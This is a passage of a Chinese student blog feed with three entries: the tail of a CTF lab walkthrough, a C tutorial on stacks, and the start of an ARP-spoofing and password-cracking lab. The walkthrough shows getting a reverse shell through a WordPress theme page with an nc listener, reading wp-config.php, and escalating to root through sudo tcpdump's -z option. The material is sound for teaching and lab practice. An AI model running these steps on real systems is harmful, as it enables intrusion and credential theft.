alt="在这里插入图片描述"></p><p>Then pay attention to the Appearance→Themes screen: version 27 is still selected here, and we need to switch this to version 26 as well. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201215213753507.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>If Themes is not changed, visiting the 404 page produces an error like this. ↓</p><p><img src="https://img-blog.csdnimg.cn/2020121521403826.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>After the change, the Themes screen looks like this. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201215214100851.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>A successful visit to the 404 page looks like this. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201215214243312.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="补充"><a href="#补充" class="headerlink" title="补充"></a>Supplement</h4><p>==Extra==: here I add some personal experience from doing this step.</p><ol><li>First, the 404 page. A 404 page means "does not exist", so if we append an arbitrary route to the IP, for example <code>http://192.168.238.134/404.php</code>, the page we get looks like this. ↓</li></ol><p> <img src="https://img-blog.csdnimg.cn/20201215214617822.jpg#pic_center" alt="在这里插入图片描述"></p><p> Note that this 404 comes from Apache and is not the page set up when the site was built, so the experiment cannot continue from a page like this.<br> There is also the question of how to determine the path of the site's own 404 page. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215214837730.jpg#pic_center" alt="在这里插入图片描述"></p><p> To be honest, I searched the back end for a long time without finding the path of the 404 page; I could only reach it because the lab guide gives it. When I asked others, the answer I got was "logical deduction"... emm. The deduction starts from the picture ↓ we got in <strong>step 6, Dirb brute-forcing the site's directories</strong>... emm.</p><p> <img src="https://img-blog.csdnimg.cn/20201215215014382.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> I did not really want to use this method, so I carried out this step with a <strong>new method</strong> that does not use the 404 page; I describe it below.</p><ol start="2"><li><p>Second is the version-switching issue, that is, the love-hate relationship between 27 and 26. I did not dig into why switching makes it work, but knowing that switching versions works is enough for this experiment.<br> 
In fact it does not have to stay at 26; it depends on the version at the time you make the change. For example, if the version at the top right is 27 when you paste the code, updating the file fails and you need to switch to 26; if it is 26 when you paste the code, updating the file also fails and you need to switch to 27. As for version 25, it always caused problems in my experiments.</p></li><li><p>Next I introduce my own method for this step.<br>Since the path of the 404 page is hard to deduce, let us choose a page ourselves; here, for example, I chose page.php. ↓</p></li><li><p><img src="https://img-blog.csdnimg.cn/20201215223326743.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p></li></ol><p> We add a new page under Page. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223331430.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> After naming the page (it need not match the file name), choose the path. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223621100.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> Then comes the familiar routine: switch the version, paste the code, update the file. ↓</p><p> <img src="https://img-blog.csdnimg.cn/2020121522370285.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> Finally, we can visit the page through <code>Preview</code>. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223743430.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> The result is as follows. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223901746.jpg#pic_center" alt="在这里插入图片描述">It can also be reached by its path, and the result is again successful. ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215223928745.jpg#pic_center" alt="在这里插入图片描述"></p><p> Note, however, that whether you use the 404 page or a page of your own choosing, ==before visiting it, start listening with NC on Kali, then visit the modified PHP page from the attacker's browser, which yields the reverse shell==.</p><p> Start listening ↓</p><p> <img src="https://img-blog.csdnimg.cn/20201215224314859.jpg#pic_center" alt="在这里插入图片描述"></p><p> What the listener receives after the page is visited. ↓</p><p> <img 
src="https://img-blog.csdnimg.cn/20201215224203865.jpg#pic_center" alt="在这里插入图片描述"></p><p> Then find the wp-config.php file<br> (the path is generally fixed when the site template is set up, so we can simply cd to it)<br> Command <code>cd /var/www/html</code><img src="https://img-blog.csdnimg.cn/20201215224643623.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> Command <code>ls</code></p><p> <img src="https://img-blog.csdnimg.cn/20201215224655170.jpg#pic_center" alt="在这里插入图片描述"></p><p> Establish the session: <code>cat wp-config.php</code></p><p> <img src="https://img-blog.csdnimg.cn/20201215225740435.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="12-SSH登录服务器"><a href="#12-SSH登录服务器" class="headerlink" title="12. SSH登录服务器"></a>12. Log in to the server over SSH</h3><p>Try to view /root/flag.txt</p><p><img src="https://img-blog.csdnimg.cn/20201215230041101.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>The administrator command does not work either</p><p><img src="https://img-blog.csdnimg.cn/20201215230125420.jpg#pic_center" alt="在这里插入图片描述"></p><p>Neither way lets us view it. ↑</p><h3 id="13-使用tcpdump执行任意命令"><a href="#13-使用tcpdump执行任意命令" class="headerlink" title="13. 使用tcpdump执行任意命令"></a>13. 
Use tcpdump to execute arbitrary commands</h3><p>(After tcpdump captures packets, it executes the specified command.)<br>Check which commands the current identity may run.</p><p><img src="https://img-blog.csdnimg.cn/20201215230211856.jpg#pic_center" alt="在这里插入图片描述"></p><p>Since the tcpdump command can be run with root privileges, we can create the attack file with <code>touch /tmp/exploit</code>. ↓<br>(After creating it I looked around and found the created file.)</p><p><img src="https://img-blog.csdnimg.cn/20201215230307212.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>The next three commands are, respectively:</p><ol><li><p>Write the shellcode: <code>echo 'cat /root/flag.txt' > /tmp/exploit</code>;</p></li><li><p>Grant execute permission: <code>chmod +x /tmp/exploit</code>;</p></li><li><p>Use tcpdump to execute an arbitrary command: <code>sudo tcpdump -i eth0 -w /dev/null -w 1 -G 1 -z /tmp/exploit -Z root</code></p></li></ol><p> <img src="https://img-blog.csdnimg.cn/20201215230442194.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p> Finally we get the result shown in the red box in the figure. ↑</p>]]></content>
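<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Experiment objectives</h2><p>By penetrating the target machine, learn how CTF competitions work and the range of knowledge they cover, such as MISC, PPC and WEB; through practice, strengthen teamwork</summary>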
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>栈和队列</title>
<link href="http://example.com/2020/11/25/%E6%A0%88%E5%92%8C%E9%98%9F%E5%88%97/"/>
<id>http://example.com/2020/11/25/%E6%A0%88%E5%92%8C%E9%98%9F%E5%88%97/</id>
<published>2020-11-25T11:21:12.000Z</published>
<updated>2022-03-18T06:03:46.023Z</updated>
<content type="html"><![CDATA[<h2 id="理解栈"><a href="#理解栈" class="headerlink" title="理解栈"></a>Understanding the stack</h2><p>A stack is a <strong>special linear list</strong>. What makes it special is that its operations are restricted to the top of the stack; the bottom of the stack is <strong>fixed</strong>, and the only operations are <strong>push</strong> and <strong>pop</strong>.</p><blockquote><p>The first element pushed is not necessarily the last one popped.</p></blockquote><p>A stack only restricts where elements are pushed and popped; it does not restrict when.</p><h2 id="栈的存储结构"><a href="#栈的存储结构" class="headerlink" title="栈的存储结构"></a>Storage structures for a stack</h2><h3 id="顺序存储"><a href="#顺序存储" class="headerlink" title="顺序存储"></a>Sequential storage</h3><h4 id="栈的结构定义"><a href="#栈的结构定义" class="headerlink" title="栈的结构定义"></a>Stack structure definition</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">typedef int DataType;</span><br><span class="line">struct SeqStack</span><br><span class="line">{</span><br><span class="line">int MAX; //maximum capacity</span><br><span class="line">int top; //top-of-stack position</span><br><span class="line">DataType *elem; //pointer to the start of the element storage</span><br><span class="line">};</span><br><span class="line">typedef struct SeqStack *SeqStack;</span><br></pre></td></tr></table></figure><h4 id="栈的创建"><a href="#栈的创建" class="headerlink" title="栈的创建"></a>Creating the stack</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">SeqStack SetNullStack_Seq(int m) //create an empty sequential stack</span><br><span class="line">{</span><br><span class="line">SeqStack sstack = (SeqStack)malloc(sizeof(struct SeqStack));</span><br><span class="line">if (sstack != NULL){</span><br><span class="line">sstack->elem = (int*)malloc(sizeof(int)*m);</span><br><span class="line">if (sstack->elem != NULL){</span><br><span class="line">sstack->MAX = m;</span><br><span class="line">sstack->top = -1;</span><br><span class="line">return(sstack);</span><br><span class="line">}</span><br><span class="line">else {</span><br><span class="line">free(sstack);</span><br><span class="line">return NULL;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">else{</span><br><span class="line">printf("out of space");</span><br><span class="line">return NULL;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="栈的判空"><a href="#栈的判空" class="headerlink" title="栈的判空"></a>Checking whether the stack is empty</h4><p>Whether the stack is empty is determined by checking whether top is -1, because the first element of a stack is generally inserted at position '0', just like the first slot of an array.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">int IsNullStack_seq(SeqStack sstack) </span><br><span class="line">{</span><br><span class="line"> return(sstack->top == -1);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="顺序进栈"><a href="#顺序进栈" class="headerlink" title="顺序进栈"></a>Sequential push</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">void Push_seq(SeqStack sstack, int x) //push</span><br><span class="line">{</span><br><span class="line">if (sstack->top >= (sstack->MAX - 1)) //check whether the stack is full</span><br><span class="line">printf("overflow! \n");</span><br><span class="line">else{</span><br><span class="line">sstack->top++; //if not full, first advance the top variable</span><br><span class="line">sstack->elem[sstack->top] = x;//store element x at the position given by top</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="顺序出栈"><a href="#顺序出栈" class="headerlink" title="顺序出栈"></a>Sequential pop</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">void Pop_seq(SeqStack sstack)//pop</span><br><span class="line">{</span><br><span class="line">if (IsNullStack_seq(sstack)) //check whether the stack is empty</span><br><span class="line">printf("Underflow!\n");</span><br><span class="line">else</span><br><span class="line">sstack->top = sstack->top - 1;//decrement top by 1</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="拓:求栈顶元素"><a href="#拓:求栈顶元素" class="headerlink" title="拓:求栈顶元素"></a>Extra: getting the top element</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">DataType Top_seq(SeqStack sstack)//get the value of the top element</span><br><span 
class="line">{</span><br><span class="line">if (IsNullStack_seq(sstack))//check whether the stack pointed to by sstack is empty</span><br><span class="line">{</span><br><span class="line">printf("it is empty");</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line">else</span><br><span class="line">return sstack->elem[sstack->top];</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Neither push nor pop contains a loop, so both have O(1) time complexity.</p><h3 id="链式存储"><a href="#链式存储" class="headerlink" title="链式存储"></a>Linked storage</h3><p>A linked stack places the top of the stack at the head of a singly linked list (the header node, which no longer serves a purpose, can be dropped), and it essentially never becomes full.<br>Most linked-stack operations resemble those of a singly linked list; only insertion and deletion are somewhat special</p><h4 id="栈的结构定义-1"><a href="#栈的结构定义-1" class="headerlink" title="栈的结构定义"></a>Stack structure definition</h4><p>Structure with a header node</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">typedef int DataType;</span><br><span class="line">struct Node{</span><br><span class="line">DataType data;</span><br><span class="line">struct Node* next;</span><br><span class="line">};</span><br><span class="line">typedef struct Node *PNode;</span><br><span class="line">typedef struct Node *LinkStack;</span><br></pre></td></tr></table></figure><p>Structure without a header node</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">typedef int Status; 
</span><br><span class="line">typedef int SElemType; /* the SElemType type depends on the actual use; int is assumed here */</span><br><span class="line"></span><br><span class="line">typedef struct StackNode</span><br><span class="line">{</span><br><span class="line">SElemType data;</span><br><span class="line">struct StackNode *next;</span><br><span class="line">}StackNode,*LinkStackPtr;</span><br><span class="line"></span><br><span class="line">typedef struct LinkStack</span><br><span class="line">{</span><br><span class="line">LinkStackPtr top;</span><br><span class="line">int count;</span><br><span class="line">}LinkStack;</span><br></pre></td></tr></table></figure><h4 id="栈的创建-1"><a href="#栈的创建-1" class="headerlink" title="栈的创建"></a>Creating the stack</h4><p>Creation with a header node</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">LinkStack SetNullStack_Link() //create an empty linked stack with a header node</span><br><span class="line">{</span><br><span class="line">LinkStack top = (LinkStack)malloc(sizeof(struct Node));</span><br><span class="line">if (top != NULL) top->next = NULL;</span><br><span class="line">else printf("Alloc failure");</span><br><span class="line">return top; //return the top-of-stack pointer</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Creation without a header node</p><p>"Reset S to an empty stack" is, in my view, a safety measure, and it can be tried in the header-node version as well.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">/* construct an empty stack S */</span><br><span class="line">Status InitStack(LinkStack *S)</span><br><span class="line">{ </span><br><span class="line"> /* no header node: an empty stack owns no node, so nothing is allocated */</span><br><span class="line"> if(!S)</span><br><span class="line"> return 0;</span><br><span class="line"> S->top=NULL;</span><br><span class="line"> S->count=0;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">/* reset S to an empty stack */</span><br><span class="line">Status ClearStack(LinkStack *S)</span><br><span class="line">{ </span><br><span class="line"> LinkStackPtr p,q;</span><br><span class="line"> p=S->top;</span><br><span class="line"> while(p)</span><br><span class="line"> { </span><br><span class="line"> q=p;</span><br><span class="line"> p=p->next;</span><br><span class="line"> free(q);</span><br><span class="line"> } </span><br><span class="line"> S->top=NULL; /* do not leave top pointing at freed nodes */</span><br><span class="line"> S->count=0;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="栈的判空-1"><a href="#栈的判空-1" class="headerlink" title="栈的判空"></a>Checking whether the stack is empty</h4><p>Empty check for a linked stack with a header node</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">int IsNullStack_link(LinkStack top) 
//判断一个链栈是否为空</span><br><span class="line">{</span><br><span class="line">if (top->next == NULL)</span><br><span class="line">return 1;</span><br><span class="line">else</span><br><span class="line">return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的链栈判空</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Status StackEmpty(LinkStack S)</span><br><span class="line">{ </span><br><span class="line"> if (S.count==0)</span><br><span class="line"> return 1;</span><br><span class="line"> else</span><br><span class="line"> return 0;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="链式进栈"><a href="#链式进栈" class="headerlink" title="链式进栈"></a>链式进栈</h4><p>有头结点的进栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">void Push_link(LinkStack top, DataType x) //进栈</span><br><span class="line">{</span><br><span class="line">PNode p;</span><br><span class="line">p = (PNode)malloc(sizeof(struct Node));</span><br><span class="line">if (p == NULL)</span><br><span class="line">printf("Alloc failure");</span><br><span class="line">else</span><br><span class="line">{</span><br><span 
class="line">p->data = x;</span><br><span class="line">p->next = top->next;</span><br><span class="line">top->next = p;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的进栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">/* 插入元素e为新的栈顶元素 */</span><br><span class="line">Status Push(LinkStack *S,SElemType e)</span><br><span class="line">{</span><br><span class="line"> LinkStackPtr s=(LinkStackPtr)malloc(sizeof(StackNode)); </span><br><span class="line"> s->data=e; </span><br><span class="line"> s->next=S->top;/* 把当前的栈顶元素赋值给新结点的直接后继,见图中① */</span><br><span class="line"> S->top=s; /* 将新的结点s赋值给栈顶指针,见图中② */</span><br><span class="line"> S->count++;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="链式出栈"><a href="#链式出栈" class="headerlink" title="链式出栈"></a>链式出栈</h4><p>有头结点的出栈</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">void Pop_link(LinkStack top)// 删除栈顶元素</span><br><span class="line">{</span><br><span class="line">PNode p;</span><br><span 
class="line">if (top->next == NULL)</span><br><span class="line">printf("it is empty stack!");</span><br><span class="line">else</span><br><span class="line">{</span><br><span class="line">p = top->next;</span><br><span class="line">top->next = p->next;</span><br><span class="line">free(p);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>无头结点的出栈<br>(这个直接自带获取栈顶元素的部分)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/* 若栈不空,则删除S的栈顶元素,用e返回其值,并返回OK;否则返回ERROR */</span><br><span class="line">Status Pop(LinkStack *S,SElemType *e)</span><br><span class="line">{ </span><br><span class="line"> LinkStackPtr p;</span><br><span class="line"> if(StackEmpty(*S))</span><br><span class="line"> return ERROR;</span><br><span class="line"> *e=S->top->data;</span><br><span class="line"> p=S->top;/* 将栈顶结点赋值给p,见图中③ */</span><br><span class="line"> S->top=S->top->next; /* 使得栈顶指针下移一位,指向后一结点,见图中④ */</span><br><span class="line"> free(p); /* 释放结点p */ </span><br><span class="line"> S->count--;</span><br><span class="line"> return OK;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="拓:求栈顶元素-1"><a href="#拓:求栈顶元素-1" class="headerlink" title="拓:求栈顶元素"></a>拓:求栈顶元素</h4><p>有头结点</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">DataType Top_link(LinkStack top)// 求栈顶元素的值</span><br><span class="line">{</span><br><span class="line">if (top->next == NULL)</span><br><span class="line">{</span><br><span class="line">printf("It is empty stack!");</span><br><span class="line">return 0;</span><br><span class="line">}</span><br><span class="line">else</span><br><span class="line">return top->next->data;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>入栈和出栈都无循环语句,所以时间复杂度均是O(1)。</p><h3 id="双栈对比"><a href="#双栈对比" class="headerlink" title="双栈对比"></a>双栈对比</h3><ol><li>时间复杂度都为O(1)</li><li>顺序栈:若元素变化范围可控,即长度固定,则用顺序栈好一些(<strong>优势:存取时定位方便</strong>)</li><li>链栈:若元素变化范围不可控,即长度不固定,则用链栈好一些(<strong>优势:可以很大!</strong>)</li></ol><h2 id="栈的拓展"><a href="#栈的拓展" class="headerlink" title="栈的拓展"></a>栈的拓展</h2><p>==正在开发ing…………==</p>]]></content>
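<summary type="html"><h2 id="理解栈"><a href="#理解栈" class="headerlink" title="Understanding the stack"></a>Understanding the stack</h2><p>A stack is a <strong>special linear list</strong>; what makes it special is that its operations are restricted to the top of the stack, while the bottom is <strong>fixed</st</summary>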
<category term="Data Structure" scheme="http://example.com/categories/Data-Structure/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>Network sniffing & identity authentication</title>
<link href="http://example.com/2020/11/10/Network%20sniffer%20&%20Identity%20authentication/"/>
<id>http://example.com/2020/11/10/Network%20sniffer%20&%20Identity%20authentication/</id>
<published>2020-11-10T03:50:56.000Z</published>
<updated>2022-03-18T06:03:46.014Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="Experiment objectives"></a>Experiment objectives</h2>
<ul><li>Learn to use a sniffer by working with Wireshark, capture packets of HTTP and other protocols in order to understand the data structures of the various protocols in the TCP/IP suite, and see through experiment that HTTP and similar protocols transmit data in plaintext</li>
<li>Study how network sniffing is carried out and defended against in a switched environment; study and exploit the security weaknesses of the ARP protocol, using Arpspoof to perform ARP spoofing and capture other users' data on the internal network</li>
<li>Be able to use BurpSuite to brute-force a website login and obtain the login password</li>
<li>Be able to crack a ZIP password, and understand the concept and configuration of secure passwords<h2 id="系统环境"><a href="#系统环境" class="headerlink" title="System environment"></a>System environment</h2></li>
<li>Kali Linux 2, Windows<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="Network environment"></a>Network environment</h2></li>
<li>Switched network topology<h2 id="实验工具"><a href="#实验工具" class="headerlink" title="Tools"></a>Tools</h2></li>
<li>Arpspoof, Wireshark, BurpSuite, fcrackzip (for ZIP password cracking)<h2 id="实验步骤和内容"><a href="#实验步骤和内容" class="headerlink" title="Steps and content"></a>Steps and content</h2><h3 id="网络嗅探部分"><a href="#网络嗅探部分" class="headerlink" title="Network sniffing"></a>Network sniffing</h3></li>
<li>Network sniffing: use Wireshark to monitor network traffic and capture packets.</li>
<li>ARP spoofing: use ArpSpoof to carry out ARP spoofing.</li>
<li>Defense: defend against ARP spoofing.</li></ul>
<h4 id="sniffer-Wireshark-抓包"><a href="#sniffer-Wireshark-抓包" class="headerlink" title="Packet capture with a sniffer (Wireshark)"></a>Packet capture with a sniffer (Wireshark)</h4>
<p>Here Kali is the attacking host A and Metasploitable is the captured host B.<br>First, look up host A's IP</p>
<p><img src="https://img-blog.csdnimg.cn/2020110816021192.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"><br>Then use <code>nmap -sP</code> to check whether host B is on the same network segment as host A</p>
<p><img src="https://img-blog.csdnimg.cn/20201108160416449.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>Then try pinging B from A</p>
<p><img src="https://img-blog.csdnimg.cn/20201108160405983.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="Image"></p>
<p>The ping succeeded. At that point I figured that since they are on the same segment, B should be able to ping A as well, and that would also give me packets to capture, the best of both worlds! (Although it doesn't quite match the original intent.)</p>
